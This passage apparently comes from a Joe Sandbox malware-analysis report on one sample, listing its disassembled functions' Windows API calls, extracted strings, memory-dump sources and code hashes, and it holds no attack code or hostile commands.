                                        • Opcode ID: abde502a1e10b7753e30d719e08e6b2af5218769bd5b9c2be451c5f1670893b5
                                        • Instruction ID: c94aa58e627e9eb187fe719f7be68230343f8e9084c29f593d3bc6944d911de8
                                        • Opcode Fuzzy Hash: abde502a1e10b7753e30d719e08e6b2af5218769bd5b9c2be451c5f1670893b5
                                        • Instruction Fuzzy Hash: 5591D775204646AFD719DF24C885BEAF7A8FF44381F004529FDA9C2190DB30EB99CB95
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000400), ref: 00C54994
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00C549DA
                                        • _wcslen.LIBCMT ref: 00C549EB
                                        • CharUpperBuffW.USER32(?,00000000), ref: 00C549F7
                                        • _wcsstr.LIBVCRUNTIME ref: 00C54A2C
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00C54A64
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00C54A9D
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00C54AE6
                                        • GetClassNameW.USER32(?,?,00000400), ref: 00C54B20
                                        • GetWindowRect.USER32(?,?), ref: 00C54B8B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                        • String ID: ThumbnailClass
                                        • API String ID: 1311036022-1241985126
                                        • Opcode ID: cc6b0f97a0a816faddbd18c6fb8be93a47b1856670c6c78b724f7fd4fd5cbad6
                                        • Instruction ID: 919a9deb085f4aae813452a377aa8460d2b9ac704d77c5fb66794ced6a280052
                                        • Opcode Fuzzy Hash: cc6b0f97a0a816faddbd18c6fb8be93a47b1856670c6c78b724f7fd4fd5cbad6
                                        • Instruction Fuzzy Hash: 0891E6350042059FDB08CF14C985FAA77E8FF8435AF048469FD959A096EB30EEC9DB69
                                        APIs
                                          • Part of subcall function 00C09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C09BB2
                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C88D5A
                                        • GetFocus.USER32 ref: 00C88D6A
                                        • GetDlgCtrlID.USER32(00000000), ref: 00C88D75
                                        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00C88E1D
                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C88ECF
                                        • GetMenuItemCount.USER32(?), ref: 00C88EEC
                                        • GetMenuItemID.USER32(?,00000000), ref: 00C88EFC
                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C88F2E
                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C88F70
                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C88FA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                        • String ID: 0
                                        • API String ID: 1026556194-4108050209
                                        • Opcode ID: f4f36e7eee74e46c329bc18485718770efc922d76d9d99247b8909068c980070
                                        • Instruction ID: 36728bfb3cfa56eeafb5708fd66dc83daa220f684bb25e4ed689388593f724f5
                                        • Opcode Fuzzy Hash: f4f36e7eee74e46c329bc18485718770efc922d76d9d99247b8909068c980070
                                        • Instruction Fuzzy Hash: 4381B0715083019FDB10EF14D884BAB7BE9FF88318F54092DFA9497691DB30DA08DB69
                                        APIs
                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C5DC20
                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C5DC46
                                        • _wcslen.LIBCMT ref: 00C5DC50
                                        • _wcsstr.LIBVCRUNTIME ref: 00C5DCA0
                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C5DCBC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                        • API String ID: 1939486746-1459072770
                                        • Opcode ID: f7279823f8766936fb09a04b62337f5c9083b978cb21cdeab2127626343ef41e
                                        • Instruction ID: a3020217df660855c9faf6da22eca8755d4bc2c6a62c976ea50ac2f8892f3a66
                                        • Opcode Fuzzy Hash: f7279823f8766936fb09a04b62337f5c9083b978cb21cdeab2127626343ef41e
                                        • Instruction Fuzzy Hash: 0C4121369403057ADB24AB64DC83EFF77ACEF46711F104069F901A61C2EA359A81A7B9
                                        APIs
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C7CC64
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00C7CC8D
                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C7CD48
                                          • Part of subcall function 00C7CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00C7CCAA
                                          • Part of subcall function 00C7CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00C7CCBD
                                          • Part of subcall function 00C7CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C7CCCF
                                          • Part of subcall function 00C7CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C7CD05
                                          • Part of subcall function 00C7CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C7CD28
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C7CCF3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                        • API String ID: 2734957052-4033151799
                                        • Opcode ID: 755de066505d46024d20f66ccb29adea97eccf6eaecc8eda02e68f4a6af24595
                                        • Instruction ID: 7b21900d30effb6c155724ddcf583fca8f0bac112f1c958dbef890e0042215d0
                                        • Opcode Fuzzy Hash: 755de066505d46024d20f66ccb29adea97eccf6eaecc8eda02e68f4a6af24595
                                        • Instruction Fuzzy Hash: F331697290112ABBDB218B51DCC8FEFBB7CEF55740F004169E91AE2240DB349B459BB4
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C63D40
                                        • _wcslen.LIBCMT ref: 00C63D6D
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C63D9D
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C63DBE
                                        • RemoveDirectoryW.KERNEL32(?), ref: 00C63DCE
                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C63E55
                                        • CloseHandle.KERNEL32(00000000), ref: 00C63E60
                                        • CloseHandle.KERNEL32(00000000), ref: 00C63E6B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                        • String ID: :$\$\??\%s
                                        • API String ID: 1149970189-3457252023
                                        • Opcode ID: 46c31ab2011fc0aa5698305f9c4d66b27bace8859d2d15a5ef72e36a76acb7a7
                                        • Instruction ID: 7916c63ece15b3355e9eeb79455c92590ef71e3a36507b8e8d78c1d5f0c8d494
                                        • Opcode Fuzzy Hash: 46c31ab2011fc0aa5698305f9c4d66b27bace8859d2d15a5ef72e36a76acb7a7
                                        • Instruction Fuzzy Hash: 4E31A171910249ABDB219BA0DC89FEF37BCEF89700F1040B5F615D60A0E77497849B24
                                        APIs
                                        • timeGetTime.WINMM ref: 00C5E6B4
                                          • Part of subcall function 00C0E551: timeGetTime.WINMM(?,?,00C5E6D4), ref: 00C0E555
                                        • Sleep.KERNEL32(0000000A), ref: 00C5E6E1
                                        • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00C5E705
                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C5E727
                                        • SetActiveWindow.USER32 ref: 00C5E746
                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C5E754
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C5E773
                                        • Sleep.KERNEL32(000000FA), ref: 00C5E77E
                                        • IsWindow.USER32 ref: 00C5E78A
                                        • EndDialog.USER32(00000000), ref: 00C5E79B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                        • String ID: BUTTON
                                        • API String ID: 1194449130-3405671355
                                        • Opcode ID: 32daf82001f52abbf5e90e9e9e1b22475aba32cb8fabb58868f9e854d8a34fd2
                                        • Instruction ID: 3740ee7fc0bc899101bbb5e1efd1b88cf40d8b105255be502b4ea2f1532718e4
                                        • Opcode Fuzzy Hash: 32daf82001f52abbf5e90e9e9e1b22475aba32cb8fabb58868f9e854d8a34fd2
                                        • Instruction Fuzzy Hash: 13215EB4200645AFEB045F61ECC9F2D3B69EB5538AF140425F855C11A1DF71AE48AB3C
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C5EA5D
                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C5EA73
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C5EA84
                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C5EA96
                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C5EAA7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: SendString$_wcslen
                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                        • API String ID: 2420728520-1007645807
                                        • Opcode ID: c98a6cae73d9f4648663a05b3135c6b30cee06b2e9c36344bdf6f928daea6cdf
                                        • Instruction ID: c05e0618f848b71381f01320b289d5e8111abe7e57e62628eab91be6f5362fcd
                                        • Opcode Fuzzy Hash: c98a6cae73d9f4648663a05b3135c6b30cee06b2e9c36344bdf6f928daea6cdf
                                        • Instruction Fuzzy Hash: EF115135A9022D79D724A7A2DC4AEFF6ABCEBD1B40F000479B911A30D1EAB00A49C5B0
                                        APIs
                                        • GetDlgItem.USER32(?,00000001), ref: 00C55CE2
                                        • GetWindowRect.USER32(00000000,?), ref: 00C55CFB
                                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00C55D59
                                        • GetDlgItem.USER32(?,00000002), ref: 00C55D69
                                        • GetWindowRect.USER32(00000000,?), ref: 00C55D7B
                                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00C55DCF
                                        • GetDlgItem.USER32(?,000003E9), ref: 00C55DDD
                                        • GetWindowRect.USER32(00000000,?), ref: 00C55DEF
                                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C55E31
                                        • GetDlgItem.USER32(?,000003EA), ref: 00C55E44
                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C55E5A
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00C55E67
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$ItemMoveRect$Invalidate
                                        • String ID:
                                        • API String ID: 3096461208-0
                                        • Opcode ID: 339a70ec48f12a2d1a0efff51c5c42b870aff8b77438a1c1235673d711dde85f
                                        • Instruction ID: ff202213047905af5635e38ab1c4b8736ffe89448443462347f0988e873d1a14
                                        • Opcode Fuzzy Hash: 339a70ec48f12a2d1a0efff51c5c42b870aff8b77438a1c1235673d711dde85f
                                        • Instruction Fuzzy Hash: C9513E75A00609AFDF18CF68DD99BAEBBB5FF48301F108129F915E6290D770AE44CB64
                                        APIs
                                          • Part of subcall function 00C08F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C08BE8,?,00000000,?,?,?,?,00C08BBA,00000000,?), ref: 00C08FC5
                                        • DestroyWindow.USER32(?), ref: 00C08C81
                                        • KillTimer.USER32(00000000,?,?,?,?,00C08BBA,00000000,?), ref: 00C08D1B
                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00C46973
                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00C08BBA,00000000,?), ref: 00C469A1
                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00C08BBA,00000000,?), ref: 00C469B8
                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00C08BBA,00000000), ref: 00C469D4
                                        • DeleteObject.GDI32(00000000), ref: 00C469E6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                        • String ID:
                                        • API String ID: 641708696-0
                                        • Opcode ID: 2de59bafcb4394ec9ab111e49bbd6d6fd8f08e6d76c6dd62450d5c271721cfa6
                                        • Instruction ID: 2bc4f9284f3d90fa1814e31d020a7d27be9e5561e91a00be2218a9b8d718ccb5
                                        • Opcode Fuzzy Hash: 2de59bafcb4394ec9ab111e49bbd6d6fd8f08e6d76c6dd62450d5c271721cfa6
                                        • Instruction Fuzzy Hash: FB61F130102710DFDB219F16D948B2A77F1FB52312F18851CE492979E4CB71AE84EF65
                                        APIs
                                          • Part of subcall function 00C09944: GetWindowLongW.USER32(?,000000EB), ref: 00C09952
                                        • GetSysColor.USER32(0000000F), ref: 00C09862
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ColorLongWindow
                                        • String ID:
                                        • API String ID: 259745315-0
                                        • Opcode ID: 5d36e1e511840128702ca7cfd7e9f30568a2fe8d98bfc203fca93d5578017fe1
                                        • Instruction ID: 4b2a04dacaaf62ef965715770891cbc98865b906e7a932193c6bd7eaa424046f
                                        • Opcode Fuzzy Hash: 5d36e1e511840128702ca7cfd7e9f30568a2fe8d98bfc203fca93d5578017fe1
                                        • Instruction Fuzzy Hash: B1417C71104640AFDB205B399C88BBA3BA5FB46330F148715F9B28B2E3D7319942DB21
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00C3F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00C59717
                                        • LoadStringW.USER32(00000000,?,00C3F7F8,00000001), ref: 00C59720
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00C3F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00C59742
                                        • LoadStringW.USER32(00000000,?,00C3F7F8,00000001), ref: 00C59745
                                        • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00C59866
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message_wcslen
                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                        • API String ID: 747408836-2268648507
                                        • Opcode ID: 97b3aebdb98c994ee58cf38d97d2a537765b3ef15d5194d6f1691aedf73a9ae1
                                        • Instruction ID: 1ea9dc15577c1cec4f5c98239613b108e1702c216b7f0ebf8eb493b39f36ce99
                                        • Opcode Fuzzy Hash: 97b3aebdb98c994ee58cf38d97d2a537765b3ef15d5194d6f1691aedf73a9ae1
                                        • Instruction Fuzzy Hash: 93411A7280021DAACB15EBA0DD86EFEB7B8EF14741F1400A5F60573092EA356F4CDB65
                                        APIs
                                          • Part of subcall function 00BF6B57: _wcslen.LIBCMT ref: 00BF6B6A
                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C507A2
                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C507BE
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C507DA
                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C50804
                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00C5082C
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C50837
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C5083C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                        • API String ID: 323675364-22481851
                                        • Opcode ID: 333807b2bfb2ebf2454c33816d4f6a39fd51f0ef5a59d818d2406553831fd64f
                                        • Instruction ID: d7fb316690782dcf90991efca4ee1ce5f4f21495f5699bc81180ecdc5d9f32f3
                                        • Opcode Fuzzy Hash: 333807b2bfb2ebf2454c33816d4f6a39fd51f0ef5a59d818d2406553831fd64f
                                        • Instruction Fuzzy Hash: 06412676C1022CABCF15EBA4DC85DFDB7B8BF04780F144169E911A31A1EB309E48CBA0
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 00C73C5C
                                        • CoInitialize.OLE32(00000000), ref: 00C73C8A
                                        • CoUninitialize.OLE32 ref: 00C73C94
                                        • _wcslen.LIBCMT ref: 00C73D2D
                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00C73DB1
                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C73ED5
                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00C73F0E
                                        • CoGetObject.OLE32(?,00000000,00C8FB98,?), ref: 00C73F2D
                                        • SetErrorMode.KERNEL32(00000000), ref: 00C73F40
                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C73FC4
                                        • VariantClear.OLEAUT32(?), ref: 00C73FD8
                                        Similarity
                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                        • String ID:
                                        • API String ID: 429561992-0
                                        • Opcode ID: b86a7fc42038648a85720ac068ad96fd806bbee3e3fa9ef14377fdeccf9eb5e1
                                        • Instruction ID: 56d4afe0b30879eb387079deda037a7a28a00e9915cbd99300a2323b8c91315c
                                        • Opcode Fuzzy Hash: b86a7fc42038648a85720ac068ad96fd806bbee3e3fa9ef14377fdeccf9eb5e1
                                        • Instruction Fuzzy Hash: BEC166716083459FC700DF68C884A2BBBE9FF89748F10895DF98A9B250D731EE45DB62
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 00C67AF3
                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C67B8F
                                        • SHGetDesktopFolder.SHELL32(?), ref: 00C67BA3
                                        • CoCreateInstance.OLE32(00C8FD08,00000000,00000001,00CB6E6C,?), ref: 00C67BEF
                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C67C74
                                        • CoTaskMemFree.OLE32(?,?), ref: 00C67CCC
                                        • SHBrowseForFolderW.SHELL32(?), ref: 00C67D57
                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C67D7A
                                        • CoTaskMemFree.OLE32(00000000), ref: 00C67D81
                                        • CoTaskMemFree.OLE32(00000000), ref: 00C67DD6
                                        • CoUninitialize.OLE32 ref: 00C67DDC
                                        Similarity
                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                        • String ID:
                                        • API String ID: 2762341140-0
                                        • Opcode ID: 5b52ccb478b51c658e240458824293407999a36fbb8aafe78dac4309a6558a18
                                        • Instruction ID: e8179caebdb7c4eaedb7adbbb88914c2e9d831b7e52125b69a0376f571c17ce6
                                        • Opcode Fuzzy Hash: 5b52ccb478b51c658e240458824293407999a36fbb8aafe78dac4309a6558a18
                                        • Instruction Fuzzy Hash: 0CC1FB75A04109AFCB14DFA4C8D8DAEBBF9FF48308B148599F9199B261D730EE45CB90
                                        APIs
                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C85504
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C85515
                                        • CharNextW.USER32(00000158), ref: 00C85544
                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C85585
